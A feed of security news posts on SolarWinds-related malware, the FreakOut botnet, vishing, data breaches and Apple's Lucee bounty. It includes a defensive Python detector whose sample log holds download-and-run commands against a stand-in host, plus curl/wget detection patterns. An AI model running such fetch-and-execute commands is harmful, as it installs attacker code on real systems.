“Throughout our analysis, we experienced first hand the difficulties customers face in managing Azure’s administrative tools to know what relationships and permissions exist within Azure tenants, particularly with third-party partner/resellers, and how to quickly enumerate them. We found it particularly challenging that many of the steps required to investigate are not documented, there was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible.”

The CrowdStrike Reporting Tool for Azure (CRT) tool could be used by administrators to analyze their Microsoft Azure environment and review the privileges assigned to third-party resellers and partners.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds APT)

The post FireEye releases an auditing tool to detect SolarWinds hackers’ activity appeared first on Security Affairs.

Sophisticated Watering Hole Attack

Google’s Project Zero has exposed a sophisticated watering-hole attack targeting both Windows and Android:

Some of the exploits were zero-days, meaning they targeted vulnerabilities that at the time were unknown to Google, Microsoft, and most outside researchers (both companies have since patched the security flaws). The hackers delivered the exploits through watering-hole attacks, which compromise sites frequented by the targets of interest and lace the sites with code that installs malware on visitors’ devices. The boobytrapped sites made use of two exploit servers, one for Windows users and the other for users of Android

The use of zero-days and complex infrastructure isn’t in itself a sign of sophistication, but it does show above-average skill by a professional team of hackers. Combined with the robustness of the attack code — ­which chained together multiple exploits in an efficient manner — the campaign demonstrates it was carried out by a “highly sophisticated actor.”


The modularity of the payloads, the interchangeable exploit chains, and the logging, targeting, and maturity of the operation also set the campaign apart, the researcher said.

No attribution was made, but the list of countries likely to be behind this isn’t very large. If you were to ask me to guess based on available information, I would guess it was the US — specifically, the NSA. It shows a care and precision that it’s known for. But I have no actual evidence for that guess.

All the vulnerabilities were fixed by last April.

Malwarebytes ‘s email systems hacked by SolarWinds attackers

Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year.

Malwarebytes revealed today that the SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms hit by the SolarWinds attackers, after FireEye, Microsoft, and CrowdStrike.

The intrusion took place last year; the company pointed out that the hackers used a different attack vector and did not exploit the SolarWinds Orion software.

The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.

“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by Malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”

On December 15, the Microsoft Security Response Center (MSRC) warned Malwarebytes of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.

With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes determined that the attackers leveraged a dormant email protection product within its Office 365 tenant, which allowed access to a limited subset of internal company emails. The security firm explained that it does not use Azure cloud services in its production environments.

Malwarebytes performed a thorough investigation of its infrastructure, inspecting its source code and its build and delivery processes, and confirmed that its internal systems showed no evidence of unauthorized access or compromise. As a result, customers of its anti-malware products were not impacted.

“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.

“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Malwarebytes ‘s email systems hacked by SolarWinds attackers appeared first on Security Affairs.

Raindrop, a fourth malware employed in SolarWinds attacks

The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads.

Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware named Raindrop for lateral movement and deploying additional payloads.

Raindrop is the fourth malware that was discovered investigating the SolarWinds attack after the SUNSPOT backdoor, the Sunburst/Solorigate backdoor and the Teardrop tool. 

Raindrop (Backdoor.Raindrop) is a loader that was used by attackers to deliver a Cobalt Strike payload. Raindrop is similar to the Teardrop tool, but while the latter was delivered by the initial Sunburst backdoor, the former was used for spreading across the victim’s network. 

“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.

Symantec has investigated four Raindrop infections to date; the malware was employed in the last phases of the attacks against a very small number of selected targets.


Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use different packers and different Cobalt Strike configurations.

“To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol.” continues the post.

“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”

The following table, from Symantec’s report, summarizes the key differences between the two tools (Teardrop first, Raindrop second):

  • Payload format
    • Teardrop: custom, reusing features from the PE format. It may be possible to reuse the packer with a range of different payloads supplied as PE DLLs with automatic conversion.
    • Raindrop: shellcode only.
  • Payload embedding
    • Teardrop: binary blob in the data section.
    • Raindrop: steganography, stored at pre-determined locations within the machine code.
  • Payload encryption
    • Teardrop: visualDecrypt combined with XOR using a long key.
    • Raindrop: AES layer before decompression; separate XOR layer using a one-byte key after decompression.
  • Obfuscation
    • Teardrop: reading a JPEG file. Inserted blocks of junk code, some of which could be generated using a polymorphic engine.
    • Raindrop: non-functional code to delay execution.
  • Export names
    • Teardrop: export names vary, in some cases overlapping with Tcl/Tk projects.
    • Raindrop: export names overlap with Tcl/Tk projects.
  • Stolen code
    • Teardrop: byte-copy of machine code from pre-existing third-party components; the original code is distributed in compiled form only.
    • Raindrop: recompiled third-party source code.

The report published by Symantec includes IoCs and Yara Rules.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Raindrop, a fourth malware employed in SolarWinds attacks appeared first on Security Affairs.

FreakOut botnet target 3 recent flaws to compromise Linux devices

Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.

Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.

The botnet appeared in the threat landscape in November 2020; in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aim at compromising the targeted systems to build an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaigns.

The attacks observed by Check Point aimed at devices that run one of the following products:

  • TerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
  • Zend Framework – a collection of packages used in building web applications and services using PHP, with more than 570 million installations
  • Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites

Once a device is infected, it is used as an attack platform against further targets.

Botnet operators are scanning the internet for vulnerable applications affected by one of the following recently disclosed vulnerabilities in order to take over the underlying Linux system:

  • CVE-2020-28188 – RCE flaw in the TerraMaster management panel (disclosed on December 24, 2020). This flaw could be exploited by a remote unauthenticated attacker to inject OS commands and gain control of servers running TerraMaster TOS (versions prior to 4.2.06).
  • CVE-2021-3007 – deserialization flaw in the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0; the attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code on the server. The code can be uploaded using the “callback” parameter, which in this case carries malicious code instead of the “callbackOptions” array.
  • CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (versions prior to 7.2.1 CE GA2, disclosed on March 20, 2020). An attacker can exploit the flaw to supply a malicious object that, when unmarshalled, allows remote code execution.

“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”

The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.

The FreakOut botnet has a modular structure and uses a specific function for each capability it supports. Below is a list of the functions implemented in the bot:

  • Port Scanning utility
  • Collecting system fingerprint
    • Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
    • TerraMaster TOS version of the system
  • Creating and sending packets
    • ARP poisoning for Man-in-the-Middle attacks.
    • Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
    • Protocol packing support created by the attacker.
  • Brute Force – using hard coded credentials 
    • With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
  • Handling sockets
    • Includes handling exceptions of runtime errors.
    • Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
  • Sniffing the network
    • Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
  • Spreading to different devices, using the “exploit” function.
    • Randomly generates the IPs to attack
    • Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
  • Gaining persistence by adding itself to the rc.local configuration.
  • DDOS and Flooding – HTTP, DNS, SYN
    • Self-implementation of Slowloris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
  • Opening a reverse-shell – shell on the client
  • Killing a process by name or ID
  • Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.

The botnet can conduct multiple malicious activities by combining the above functions, such as delivering cryptocurrency miners, launching DDoS attacks, or spreading laterally across a company network.
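An added example (not Check Point’s code) of turning the download, chmod, run-with-Python-2 sequence described above into a detection: it groups a constructed process-execution log by process id and flags a download of a .py file that is followed, within a time window, by its execution under Python 2, noting whether a chmod on the same file was seen in between. The log format, the host and the script name are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed log format for the example: "<timestamp> pid=<n> cmd=<command line>".
SAMPLE_LOG = """\
2021-01-18T10:00:01Z pid=4021 cmd=curl -fsSL http://example.invalid/loader.py -o /tmp/loader.py
2021-01-18T10:00:02Z pid=4021 cmd=chmod +x /tmp/loader.py
2021-01-18T10:00:03Z pid=4021 cmd=python2 /tmp/loader.py
2021-01-18T10:05:00Z pid=5100 cmd=wget http://example.invalid/setup.py
2021-01-18T10:05:30Z pid=5100 cmd=python3 setup.py install
2021-01-18T10:09:00Z pid=6000 cmd=python2 /opt/legacy/report.py
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b.*?(?P<url>https?://\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+(?P<path>\S+)")
# "python" or "python2[.x]" but not python3: the bot is run with the EOL interpreter.
PY2_RE = re.compile(r"\bpython2?(?:\.\d+)?\s+(?P<path>\S+\.py)\b")


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _script_name(cmd, url):
    """Name the download lands under: the -o/-O target if given, else the URL's last path element."""
    m = re.search(r"\s-[oO]\s+(\S+)", cmd)
    return _basename(m.group(1) if m else urlparse(url).path)


def detect_download_and_run(log_text, window_seconds=300):
    """Flag processes that fetch a .py file and execute it under Python 2 within the window."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        sessions[m["pid"]].append((ts, m["cmd"]))

    hits = []
    for pid, events in sessions.items():
        events.sort()
        for i, (t0, cmd) in enumerate(events):
            d = DOWNLOAD_RE.search(cmd)
            if not d:
                continue
            script = _script_name(cmd, d["url"])
            if not script.endswith(".py"):
                continue
            chmod_seen = False
            for t1, later in events[i + 1:]:
                if (t1 - t0).total_seconds() > window_seconds:
                    break                       # too far apart to be one attack chain
                c = CHMOD_RE.search(later)
                if c and _basename(c["path"]) == script:
                    chmod_seen = True
                e = PY2_RE.search(later)
                if e and _basename(e["path"]) == script:
                    hits.append({"pid": pid, "script": script, "url": d["url"],
                                 "downloaded_at": t0.isoformat(), "executed_at": t1.isoformat(),
                                 "chmod_seen": chmod_seen})
                    break
    return hits


if __name__ == "__main__":
    for hit in detect_download_and_run(SAMPLE_LOG):
        print(hit)
```

Tying the stages together by the downloaded file name, rather than alerting on any python2 invocation, keeps legacy scripts such as the constructed report.py line out of the results; in a real deployment the same logic would run over auditd, osquery or EDR process events instead of this flat log.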

Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.

The botnet is in an early stage: at the time of the analysis, the IRC panel showed it was controlling only 188 bots.

Check Point experts were also able to track its author, who goes by the moniker Freak.

“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media.  Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.

“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”

The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).

Pierluigi Paganini

(SecurityAffairs – hacking, FreakOut botnet)

The post FreakOut botnet target 3 recent flaws to compromise Linux devices appeared first on Security Affairs.

Vishing attacks conducted to steal corporate accounts, FBI warns

The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts.

The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) that warns of ongoing vishing attacks aimed at stealing corporate accounts and credentials from US and international-based employees.

Vishing (also known as voice phishing) is a social engineering attack technique where attackers impersonate a trusted entity during a voice call in an attempt to trick victims into providing sensitive information.

The alert highlights that during the COVID-19 pandemic organizations are more exposed to these attacks because they quickly changed their working processes to maintain social distancing. As a result, network access and privilege escalation may not be fully monitored.

The threat actors are using Voice over Internet Protocol (VoIP) platforms to obtain employees’ credentials.

“Cyber criminals are trying to obtain all employees’ credentials, not just individuals who would likely have more access based on their corporate position.” reads the FBI alert. “The cyber criminals vished these employees through the use of VoIP platforms.”

Once they have gained access to the network, crooks expand that access, for example by escalating the privileges of the compromised employees’ accounts.

The alert reports the case of an attack in which cyber criminals found an employee via the company’s chatroom and tricked them into logging into a fake VPN page. The attackers then used these credentials to log into the company’s VPN and performed reconnaissance to find employees with higher privileges who could perform username and e-mail changes; they found such an employee through a cloud-based payroll service and used a chatroom messaging service to conduct a phishing attack against that employee.

Below the mitigations recommended by the FBI:

  • Implement multi-factor authentication (MFA) for accessing employees’ accounts in order to minimize the chances of an initial compromise.
  • When new employees are hired, network access should be granted on a least privilege scale. Periodic review of this network access for all employees can significantly reduce the risk of compromise of vulnerable and/or weak spots within the network.
  • Actively scanning and monitoring for unauthorized access or modifications can help detect a possible compromise in order to prevent or minimize the loss of data.
  • Network segmentation should be implemented to break up one large network into multiple smaller networks which allows administrators to control the flow of network traffic.
  • Administrators should be issued two accounts: one account with admin privileges to make system changes and the other account used for email, deploying updates, and generating reports.

This is the second warning of active vishing attacks targeting employees issued by the FBI since the start of the pandemic, during which an increasing number of employees have become teleworkers.

In August 2020, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory warning remote workers of an ongoing vishing campaign targeting companies from several US industry sectors.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, vishing)

The post Vishing attacks conducted to steal corporate accounts, FBI warns appeared first on Security Affairs.

Injecting a Backdoor into SolarWinds Orion

Crowdstrike is reporting on a sophisticated piece of malware that was able to inject malware into the SolarWinds build process:

Key Points

  • SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
  • SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.
  • Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.

Analysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in order to insert SUNBURST into the update packages. The design of SUNSPOT suggests StellarParticle developers invested a lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid revealing their presence in the build environment to SolarWinds developers.

This, of course, reminds many of us of Ken Thompson’s thought experiment from his 1984 Turing Award lecture, “Reflections on Trusting Trust.” In that talk, he suggested that a malicious C compiler might add a backdoor into programs it compiles.

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well-installed microcode bug will be almost impossible to detect.

That’s all still true today.
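A build-integrity check, added here as an illustration and not CrowdStrike’s or SolarWinds’ code: pin a SHA-256 manifest of the source tree on a trusted host before the build, then verify the build server’s copy against it immediately before the compiler runs, so a source file swapped in the way SUNSPOT does shows up as modified. The set of file suffixes and the constructed tree are assumptions for the example.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumption for the example: only these suffixes count as build inputs.
SOURCE_SUFFIXES = {".cs", ".csproj", ".c", ".h"}


def file_digest(path):
    """SHA-256 of a file, read in chunks so large sources do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map of relative path -> digest for every source file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): file_digest(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix in SOURCE_SUFFIXES
    }


def verify_tree(root, manifest):
    """Compare the tree on disk with a manifest pinned earlier on a trusted host."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "unexpected": sorted(k for k in current if k not in manifest),
    }


def demo():
    """Constructed scenario: pin a tree, then tamper with it the way a build-time implant would."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "src"
        src.mkdir()
        (src / "Core.cs").write_text("class Core { }\n")
        (src / "Util.cs").write_text("class Util { }\n")
        manifest = build_manifest(src)          # taken before the build starts
        # Simulated swap of one source file just before compilation, plus a dropped extra file.
        (src / "Core.cs").write_text("class Core { /* injected */ }\n")
        (src / "Extra.cs").write_text("class Extra { }\n")
        return verify_tree(src, manifest)


if __name__ == "__main__":
    print(demo())
```

The manifest only helps if it is produced and signed somewhere the attacker does not control; an implant with write access to the build host can regenerate a manifest as easily as it replaces a source file. It also says nothing about the compiler itself, which is exactly the gap Thompson’s lecture points at.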

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

OpenWRT forum hacked, intruders stole user data

The OpenWRT forum, the community behind the open-source project for embedded operating systems based on Linux, disclosed a data breach.

OpenWrt is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic. The main components are Linux, util-linux, musl, and BusyBox. All components have been optimized to be small enough to fit into the limited storage and memory available in home routers.

OpenWRT forum was compromised during the weekend and user data were stolen by intruders.

The administrators of the forum disclosed the data breach with an announcement published on the forum.

The attack took place on Saturday, around 04:00 (GMT), when threat actors compromised an administrator account and downloaded a copy of the list of users.

“Around 0400 GMT on 16 Jan 2021, an administrator account on the OpenWrt forum ( was breached. It is not known how the account was accessed: the account had a good password, but did not have two-factor authentication enabled.” states the data breach notification published by the administrators of the forum. “The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum. Although we do not believe the intruder could download the database, from an abundance of caution, we are following the advice of the Discourse community and have reset all passwords on the Forum, and flushed any API keys.”

The list contains email addresses, handles, and other statistical information about the users of the forum. According to the announcement, the compromised account was using a “a good password,” but it was not using two-factor authentication (2FA).

Administrators do not believe the attackers have downloaded the database of the forum containing users’ credentials.

However, with an abundance of caution, forum administrators reset all passwords and flushed any API keys.

Users have to reset their password manually on the forum by following the “get a new password” instructions. Users who sign in with their GitHub login/OAuth key should reset or refresh it.

The notice states that OpenWrt forum credentials are separate from OpenWrt Wiki credentials, which means that the data breach did not compromise Wiki credentials.

OpenWRT administrators warn of phishing attempts against forum users.

“You should assume that your email address and handle have been disclosed. That means you may get phishing emails that include your name. DO NOT click links, but instead manually type the URL of the forum as above.” states the advisory.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post OpenWRT forum hacked, intruders stole user data appeared first on Security Affairs.

500K+ records of C-level people from Capital Economics leaked online

Experts from Cyble recently found a leak of 500K+ records of C-level people from Capital Economics on a Russian-speaking forum.

During routine Darkweb monitoring, researchers from Cyble found a leak of 500K+ records of C-level people from Capital Economics on a Russian-speaking forum. Capital Economics is one of the leading independent economic research companies in the world, providing macroeconomic, financial market and sectoral forecasts and consultancy.


“Upon analysis of the data, Cyble discovered that there are 500K+ lines of record containing various prominent user profiles.” reads the post published by Cyble.

Leaked records include email IDs, password hashes, addresses, etc.  

Cyble informed its clients about this leak, pointing out that the availability of corporate email IDs could allow threat actors to carry out a broad range of malicious activities.

Cyble recommends people to: 

  • Never share personal information, including financial information over phone, email or SMSes. 
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Regularly monitor your financial transactions, and if you notice any suspicious activity, contact your bank immediately. 
  • Turn on the automatic software update feature on your computer, mobile and other connected devices wherever possible and pragmatic. 
  • Use a reputed anti-virus and Internet security software package on your connected devices including PC, laptop, and mobile. 
  • People who are concerned about their exposure in the Darkweb can register at to ascertain their exposure. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.  

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Capital Economics)

The post 500K+ records of C-level people from Capital Economics leaked online appeared first on Security Affairs.

Apple paid a $50,000 bounty to two bug bounty hunters for hacking its hosts

A duo of white hat hackers claims to have earned $50,000 from Apple for reporting serious flaws that allowed them to access the company’s servers.

The Indian white hat hackers Harsh Jaiswal and Rahul Maini claim to have discovered multiple flaws that allowed them to access Apple servers.

The duo started focusing on Apple’s infrastructure in an attempt to emulate the success of a team of researchers composed of Sam Curry, Brett Buerhaus, Ben Sadeghipour, Samuel Erb and Tanner Barnes, who reported a total of 55 flaws to Apple in October as part of the company’s bug bounty program and received 32 payouts for a total of $288,500.

The two experts focused on critical findings such as PII exposure or getting access to Apple’s servers or internal network.

While conducting reconnaissance and fingerprinting, the experts found three Apple hosts running a content management system (CMS) backed by Lucee, a dynamic, Java-based tag and scripting language used for rapid web application development. The three hosts are:

[Image: the three Apple hosts running Lucee, as shown in the researchers’ write-up]

The hosts were exposing the Lucee admin panel, and two of them were running an outdated version. The hosts with the outdated version were exposing travel portals that Apple had implemented for its employees.

Although the outdated versions were affected by known security flaws, the experts pointed out that Apple was using a WAF to mitigate attacks against its applications.

The security duo discovered a misconfiguration in Lucee that could be exploited to access files without being authenticated, opening the door to the creation of a webshell on Apple servers and the execution of arbitrary code.

“While testing out Lucee locally, we came across a critical misconfiguration which allowed an attacker to access authenticated CFM (ColdFusion) files directly. This allowed us to perform a lot of authenticated actions while being completely unauthenticated. As soon as you hit the request.admintype variable/property in a CFM file, the execution flow will stop as we’re not authenticated as admin. However, any code before that check executes.” reads the post published by the bug bounty hackers. “So we had to find files that had some sort of bug before they hit request.admintype. We made use of these three files to gain a complete pre-auth/unauth RCE on a Lucee installation:

  • imgProcess.cfm (not available in older versions)
  • ext.applications.upload.cfm”

The experts provided technical details of their activity, explaining how they avoided triggering Apple’s web application firewall and got a shell on two of the hosts.

Jaiswal and Maini shared their findings with Apple, which awarded them a $50,000 bug bounty. The IT giant promptly addressed the issue but asked the experts not to disclose the flaw until it had made some other changes.

The development team behind Lucee also fixed the bug by restricting direct access to CFM files; the fix was published as a commit to the Lucee repository.

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

Rob Joyce is the new NSA Cyber Director

The U.S. National Security Agency has appointed Rob Joyce, a veteran of US cybersecurity, as the agency’s new director of cybersecurity.

The National Security Agency (NSA) has appointed US cybersecurity official Rob Joyce as the new chief of its Cybersecurity Directorate. Joyce had served as the NSA’s top representative in the UK since 2018. He succeeds Anne Neuberger, who was recently appointed Deputy National Security Advisor for Cyber and Emerging Technology on the National Security Council (NSC). Neuberger had been the director of the directorate since its creation in 2019.

Joyce also served as senior advisor to the NSA director on cybersecurity strategy.

Joyce has previously held other roles at the NSA, including chief of Tailored Access Operations (TAO), now known as Computer Network Operations, the agency’s cyber-warfare and intelligence-gathering unit.

Rob Joyce also served as deputy director of the Information Assurance Directorate (IAD).

Pierluigi Paganini

(SecurityAffairs – hacking, NSA)

German laptop retailer fined €10.4m under GDPR for video-monitoring employees

German data regulator LfD Lower Saxony announced a €10.4M fine under the GDPR against the online laptop and electronic goods retailer NBB for video-monitoring its employees.

The State Commissioner for Data Protection (LfD) Lower Saxony announced a €10.4 million fine under the GDPR against the online laptop and electronic goods retailer NBB ( for video-monitoring its employees for at least two years. This fine is the highest the German authority has imposed so far.

“The State Commissioner for Data Protection (LfD) Lower Saxony has imposed a fine of 10.4 million euros on AG.” states the LfD. “The company had video-monitored its employees for at least two years without any legal basis. The illegal cameras recorded workplaces, sales rooms, warehouses and common areas, among other things.”

“The State Commissioner for Data Protection (LfD) Lower Saxony said NBB’s ( constant surveillance was “inadmissible” under the General Data Protection Regulation (GDPR).” reported ComplianceWeek.

NBB was disappointed by the decision and called the fine “inadmissible”; it claimed that the video cameras had been installed to prevent and investigate criminal offenses and to track the flow of goods in the warehouses.

“The fine is completely disproportionate. It bears no relation to the size and financial strength of the company or to the seriousness of the alleged violation,” CEO Oliver Hellmold said (original statement, translated statement). “We consider the decision to be unlawful and demand that it be repealed.”

The data regulator pointed out that, to prevent theft, a company must first put in place less intrusive measures, such as random bag checks. Video surveillance to uncover criminal offenses is only lawful if there is a justified suspicion against specific employees, and even then a company may use cameras to monitor the suspects only for a limited period of time. This was not the case at NBB: the video surveillance had been in place for a long time, and the recordings were kept for 60 days in many cases, significantly longer than necessary.

“We are dealing with a serious case of video surveillance in the company,” said Barbara Thiel, head of LfD Lower Saxony. “Companies must understand that with such intensive video surveillance they are massively violating the rights of their employees.”

The LfD remarks that permanent and intensive video surveillance violates the rights of employees and puts them under pressure.

“Customers of were also affected by the inadmissible video surveillance, as some cameras were aimed at seating in the sales area. In areas in which people typically stay longer, for example to extensively test the devices offered, those affected by data protection law have high interests worthy of protection.” continues the German data authority. “This is especially true for seating areas that are obviously intended to invite you to linger for a longer period of time. Therefore, the video surveillance by was not proportionate in these cases.”

The German privacy watchdog also fined the clothing retailer H&M €35.3 million because it was allegedly spying on its customer service representatives in Germany.

Pierluigi Paganini

(SecurityAffairs – hacking, GDPR)

President Biden’s Peloton exercise equipment under scrutiny

President Joe Biden can’t bring his Peloton exercise equipment to the White House due to security reasons.

According to a Popular Mechanics report, President Joe Biden, who is moving into the White House, will likely have to give up his Peloton exercise equipment for security reasons.

The popularity of Peloton exercise equipment surged during the pandemic; it allows users to exercise from home while interacting with each other in an online community.


Peloton devices are connected online and are equipped with a camera and microphone that give users an immersive experience and communication capabilities. On the other hand, these features pose a potential risk to the user if the device is hacked, and President Joe Biden is a high-value target.

To secure the exercise equipment, Biden’s Peloton may have to be modified by removing the microphone, camera and networking equipment.

“If you really want that Peloton to be secure, you yank out the camera, you yank out the microphone, and you yank out the networking equipment … and you basically have a boring bike,” Max Kilger, Ph.D., director of the Data Analytics Program and Associate Professor in Practice at the University of Texas at San Antonio, told Popular Mechanics. “You lose the shiny object and the attractiveness.”

The case has an important precedent: three years ago, The Verge revealed that a person close to the company had confirmed that Michelle Obama had a Peloton, but it was a modified model without a camera or microphone.

Peloton runs a custom operating system built on top of Android and is equipped with networking hardware to access the user’s home WiFi network or a hard-wired connection such as Ethernet.

“That allows the bike to communicate with your Apple Watch or Fitbit, which are internet-of-things (IoT) devices that contain microphones. If a hacker found a way to infect Biden’s Peloton, then it’s theoretically possible they could hop from the bike to the watch and vice versa,” Kilger added.

Several online hacking communities focus on IoT devices, including Peloton equipment. The risk is that someone could find a way to compromise the equipment with malware, then move laterally within the host network and compromise other connected devices.

The report pointed out that the Secret Service can take precautions to secure the President’s gym sessions. They could set up the bike in a dedicated gym area where classified topics may not be discussed. Another countermeasure is to use a hardwired connection for the President’s Peloton that is separate from the rest of the White House network.

Pierluigi Paganini

(SecurityAffairs – hacking, Peloton)

EMA said that hackers manipulated stolen documents before leaking them

The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers had been manipulated before being leaked.

The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers in a recent cyber attack had been manipulated.

In December, a cyber attack hit the European Medicines Agency (EMA). When the hack was disclosed, the EMA did not provide technical details about the attack or say whether it would affect its operations while it was evaluating and approving COVID-19 vaccines.

The European agency plays a crucial role in the evaluation of COVID-19 vaccines across the EU and has access to sensitive and confidential information, including quality, safety, and efficacy data from trials.

Nation-state actors consider organizations involved in vaccine research a strategic target for gathering intelligence on governments’ ongoing response to the pandemic. At the end of November, Reuters revealed in an exclusive that the COVID vaccine maker AstraZeneca had been targeted by alleged North Korea-linked hackers.

